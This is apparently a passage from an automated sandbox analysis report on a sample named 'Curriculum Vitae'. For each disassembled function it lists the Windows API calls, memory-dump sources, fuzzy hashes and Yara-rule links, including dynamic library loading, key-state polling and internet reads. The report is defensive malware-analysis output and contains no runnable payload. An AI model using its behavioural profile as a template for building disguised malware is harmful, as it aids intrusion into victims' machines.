                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                      • String ID:
                      • API String ID: 826366716-0
                      • Opcode ID: 7c71e3aa71953893f0a763cec96479588bf10ea4bbd6d3d5839903d137bb1974
                      • Instruction ID: 7767d8ca332a5e78079469da5f6e72aa9b9b82d8f18a195f009904c47c53abc8
                      • Opcode Fuzzy Hash: 7c71e3aa71953893f0a763cec96479588bf10ea4bbd6d3d5839903d137bb1974
                      • Instruction Fuzzy Hash: D1617C31208241EFD714DF14C890E6ABBE5FF84318F58855DF49A8B2A2DB71ED45CBA2
                      Function 00D98BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(?), ref: 00D98BCD
                      • VariantClear.OLEAUT32 ref: 00D98C3E
                      • VariantClear.OLEAUT32 ref: 00D98C9D
                      • VariantClear.OLEAUT32(?), ref: 00D98D10
                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D98D3B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$Clear$ChangeInitType
                      • String ID:
                      • API String ID: 4136290138-0
                      • Opcode ID: 275cdfed2978dc5238f4ccade96b9d332e8fb0347ac3e09de9ca990d0bb3b1df
                      • Instruction ID: 999c592c37a5f3696dd2078d6b9aac8dc94f53e32aa82d1b217351b9aabe86f1
                      • Opcode Fuzzy Hash: 275cdfed2978dc5238f4ccade96b9d332e8fb0347ac3e09de9ca990d0bb3b1df
                      • Instruction Fuzzy Hash: D9515C75A0021ADFCB14CF68C894EAAB7F4FF89710B158559E909DB350D730E911CFA0
                      Function 00DA8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DA8BAE
                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DA8BDA
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DA8C32
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DA8C57
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DA8C5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String
                      • String ID:
                      • API String ID: 2832842796-0
                      • Opcode ID: f0ce407bd422d86571777b2e5c46a55fe4662c83d3de3775e6692b41f4a41552
                      • Instruction ID: 591f7fcc6347a1ca391031a38a003d59dcef0a541c65062f38e4c52979217dd2
                      • Opcode Fuzzy Hash: f0ce407bd422d86571777b2e5c46a55fe4662c83d3de3775e6692b41f4a41552
                      • Instruction Fuzzy Hash: E0513975A00619AFCB14DF65C880A69BBF5FF49314F088058E849AB362CB31ED51DFB0
                      Function 00DB8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DB8F40
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00DB8FD0
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00DB8FEC
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00DB9032
                      • FreeLibrary.KERNEL32(00000000), ref: 00DB9052
                        • Part of subcall function 00D4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DA1043,?,7529E610), ref: 00D4F6E6
                        • Part of subcall function 00D4F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D8FA64,00000000,00000000,?,?,00DA1043,?,7529E610,?,00D8FA64), ref: 00D4F70D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                      • String ID:
                      • API String ID: 666041331-0
                      • Opcode ID: 805b663179c1f01cbc9040a41b508a4aba6ee7c703dfc8d64259d3751390b219
                      • Instruction ID: 734e6faf3a40d75cbb1ab269cb68e74cdbe7cf50e3efa4477c6049a823ff5537
                      • Opcode Fuzzy Hash: 805b663179c1f01cbc9040a41b508a4aba6ee7c703dfc8d64259d3751390b219
                      • Instruction Fuzzy Hash: 42512A35605245DFCB15EF58C4948ADBBF1FF49324F098099E90A9B362DB31ED86CBA0
                      Function 00DC6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                      Download Yara Rule
                      APIs
                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DC6C33
                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00DC6C4A
                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DC6C73
                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DAAB79,00000000,00000000), ref: 00DC6C98
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DC6CC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long$MessageSendShow
                      • String ID:
                      • API String ID: 3688381893-0
                      • Opcode ID: 7c8f9d7e55b3a6a151b9714ca2a7333006d5123684d5acc9094c8d065a59e3b2
                      • Instruction ID: 680da80da481e65fcef676162aadcd8cfd9c7d239a27e102907ba26b16554de4
                      • Opcode Fuzzy Hash: 7c8f9d7e55b3a6a151b9714ca2a7333006d5123684d5acc9094c8d065a59e3b2
                      • Instruction Fuzzy Hash: 6841A135A04106AFDB25CF28CE58FA97FA5EB49350F18026CF999A72E1C371ED41CA60
                      Function 00D62051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 257cf50f8c53556ff26bcff98b05af6421aad17f810453945ae5d467142f10a0
                      • Instruction ID: b6ddeeb2831be5ed08544cb27599a44627878583a42168477f2bc27cd0f97198
                      • Opcode Fuzzy Hash: 257cf50f8c53556ff26bcff98b05af6421aad17f810453945ae5d467142f10a0
                      • Instruction Fuzzy Hash: 9E41E232A00704AFCB24DF78C981A6DB3F5EF89314F194569E915EB355DB31AD01CBA0
                      Function 00D4912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 00D49141
                      • ScreenToClient.USER32(00000000,?), ref: 00D4915E
                      • GetAsyncKeyState.USER32(00000001), ref: 00D49183
                      • GetAsyncKeyState.USER32(00000002), ref: 00D4919D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AsyncState$ClientCursorScreen
                      • String ID:
                      • API String ID: 4210589936-0
                      • Opcode ID: 9940ea8a5b310586f65a4045df333f61414bc9a49933fe8083d801c47e334634
                      • Instruction ID: 6aa031139fef8860392f151f7a06a3b2a91f34e97f966c0cd8ff6aac12b96778
                      • Opcode Fuzzy Hash: 9940ea8a5b310586f65a4045df333f61414bc9a49933fe8083d801c47e334634
                      • Instruction Fuzzy Hash: 12414F71A0861BBBDF15AF65C858BEEF774FB05320F248219E469A72D4C730A950CBB1
                      Function 00DA3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetInputState.USER32 ref: 00DA38CB
                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DA3922
                      • TranslateMessage.USER32(?), ref: 00DA394B
                      • DispatchMessageW.USER32(?), ref: 00DA3955
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DA3966
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                      • String ID:
                      • API String ID: 2256411358-0
                      • Opcode ID: 18a165692381ba7ed9b175820311db1a531111c541ee68e0b81efadd3cb4fc86
                      • Instruction ID: 4acd34be0cf66e08e009099adc1afc1cb3833e43a5b506c7f28f1d05d0952e32
                      • Opcode Fuzzy Hash: 18a165692381ba7ed9b175820311db1a531111c541ee68e0b81efadd3cb4fc86
                      • Instruction Fuzzy Hash: 4531C4709043429FEB35CB759848BB737A9EB07344F08456DF4A6D61A0E3B99A89CF31
                      Function 00DACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                      Download Yara Rule
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00DACF38
                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00DACF6F
                      • GetLastError.KERNEL32(?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFB4
                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFC8
                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00DAC21E,00000000), ref: 00DACFF2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                      • String ID:
                      • API String ID: 3191363074-0
                      • Opcode ID: 6ba5150148ec884e7786ef7b66ccb1b5336452afd478f8c75fd408e049b2880b
                      • Instruction ID: b932c3e7f8970ad08fe760eef2edf46a9c2a84050b1b728c0be0a3ff74e7705c
                      • Opcode Fuzzy Hash: 6ba5150148ec884e7786ef7b66ccb1b5336452afd478f8c75fd408e049b2880b
                      • Instruction Fuzzy Hash: 4C316B71915306AFDB20DFA5C884AAABBF9EF05320B14542EF50AD2250EB30EE41DB70
                      Function 00D91901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00D91915
                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00D919C1
                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00D919C9
                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00D919DA
                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D919E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessagePostSleep$RectWindow
                      • String ID:
                      • API String ID: 3382505437-0
                      • Opcode ID: 0c7cfa55c1e3b7d5cc20d50319aec3a50d40286148735e9fd1623ef78baa03d9
                      • Instruction ID: 40f522849a84d44e1d94cc71a007d87507d83ba3086bc9a286cfeefed79eb10f
                      • Opcode Fuzzy Hash: 0c7cfa55c1e3b7d5cc20d50319aec3a50d40286148735e9fd1623ef78baa03d9
                      • Instruction Fuzzy Hash: DD31AD75A0021AEFDF00CFA8C999ADE3BB5EB04315F144229FA65E72D1C7709944CFA0
                      Function 00DC5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DC5745
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DC579D
                      • _wcslen.LIBCMT ref: 00DC57AF
                      • _wcslen.LIBCMT ref: 00DC57BA
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC5816
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$_wcslen
                      • String ID:
                      • API String ID: 763830540-0
                      • Opcode ID: 6f2491d70cf3b89176a47507149f8ae12ba47ccd1f3f0989038f37fd961fe841
                      • Instruction ID: aa329a85b31db24ef610c5ae2ed98a96cf2353d1c103bdbd1bda358e4e110923
                      • Opcode Fuzzy Hash: 6f2491d70cf3b89176a47507149f8ae12ba47ccd1f3f0989038f37fd961fe841
                      • Instruction Fuzzy Hash: B821803190461A9ADB208F60DC85EEE77B8EF05324F14825AE929EB1C4D770A9C6CF70
                      Function 00DB0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                      Download Yara Rule
                      APIs
                      • IsWindow.USER32(00000000), ref: 00DB0951
                      • GetForegroundWindow.USER32 ref: 00DB0968
                      • GetDC.USER32(00000000), ref: 00DB09A4
                      • GetPixel.GDI32(00000000,?,00000003), ref: 00DB09B0
                      • ReleaseDC.USER32(00000000,00000003), ref: 00DB09E8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ForegroundPixelRelease
                      • String ID:
                      • API String ID: 4156661090-0
                      • Opcode ID: d72f9509044ea390cca437adaf6c88b9ed7cf028026d105683c2a04e3a6ca5e8
                      • Instruction ID: 52649c4e9614d4ece6e2de3ca0ad4ab10e33bb34e36be22b34eb8bf1e62a3192
                      • Opcode Fuzzy Hash: d72f9509044ea390cca437adaf6c88b9ed7cf028026d105683c2a04e3a6ca5e8
                      • Instruction Fuzzy Hash: BB216F35600205AFD704EF65C984EAEBBE9EF49740F048069F94AD7762CB70AD04CB70
                      Function 00D6CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 00D6CDC6
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6CDE9
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D6CE0F
                      • _free.LIBCMT ref: 00D6CE22
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D6CE31
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                      • String ID:
                      • API String ID: 336800556-0
                      • Opcode ID: a366c51fb5fdc88c657629758821412f6f2de66c6fde8ee9962242fc05bbec31
                      • Instruction ID: 4432435b67e5b24faceb4184133764018e9331c9bec1b36d5d93eeb05e1d4f78
                      • Opcode Fuzzy Hash: a366c51fb5fdc88c657629758821412f6f2de66c6fde8ee9962242fc05bbec31
                      • Instruction Fuzzy Hash: 7901A772A227167F232156B66C8CD7F7A7DDEC6FA13191129FE49C7202EA66CD0181F0
                      Function 00D49639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                      Download Yara Rule
                      APIs
                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D49693
                      • SelectObject.GDI32(?,00000000), ref: 00D496A2
                      • BeginPath.GDI32(?), ref: 00D496B9
                      • SelectObject.GDI32(?,00000000), ref: 00D496E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ObjectSelect$BeginCreatePath
                      • String ID:
                      • API String ID: 3225163088-0
                      • Opcode ID: 8fa70b406fb581696cfe069c218070dee82d25b7a03dea569d2e8f8c80e18123
                      • Instruction ID: 68995d19a2337261ed9c2a70a1b44cf86f4d6d1a97a1e733af059214a9a67f52
                      • Opcode Fuzzy Hash: 8fa70b406fb581696cfe069c218070dee82d25b7a03dea569d2e8f8c80e18123
                      • Instruction Fuzzy Hash: 02219530812306EFDB119F67EC28BAA7B64BB90365F550255F454BA1B0D37198DACFB0
                      Function 00D95711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _memcmp
                      • String ID:
                      • API String ID: 2931989736-0
                      • Opcode ID: 9c8ef76d984fb0ec2c1346f46a21d468e7d0f7a434900a5d5e94552049e615a8
                      • Instruction ID: 567a8fed55e40835bbdff6af086cefe1a0cce5477d29a0dc1765480e23d6b63c
                      • Opcode Fuzzy Hash: 9c8ef76d984fb0ec2c1346f46a21d468e7d0f7a434900a5d5e94552049e615a8
                      • Instruction Fuzzy Hash: FD01D26524160ABEAF095A50BE92FFA635EDB21395B144034FD049B245F730EE1883B0
                      Function 00D62DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLastError.KERNEL32(?,?,?,00D5F2DE,00D63863,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6), ref: 00D62DFD
                      • _free.LIBCMT ref: 00D62E32
                      • _free.LIBCMT ref: 00D62E59
                      • SetLastError.KERNEL32(00000000,00D31129), ref: 00D62E66
                      • SetLastError.KERNEL32(00000000,00D31129), ref: 00D62E6F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: 5d45f9f30d01fcddc188b979febe9d8b3ccfdbcc4551d4de6c33664b2ea5075e
                      • Instruction ID: cfeea767788e550f8117a42e6a5440465225a0147b37f9c22ec13a80f08304e4
                      • Opcode Fuzzy Hash: 5d45f9f30d01fcddc188b979febe9d8b3ccfdbcc4551d4de6c33664b2ea5075e
                      • Instruction Fuzzy Hash: 5301FF36685F026BC61227346C4AE3B266DEBD53B1B294039F965E22D3EB22CC118530
                      Function 00D9000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                      Download Yara Rule
                      APIs
                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?,?,00D9035E), ref: 00D9002B
                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90046
                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90054
                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?), ref: 00D90064
                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D8FF41,80070057,?,?), ref: 00D90070
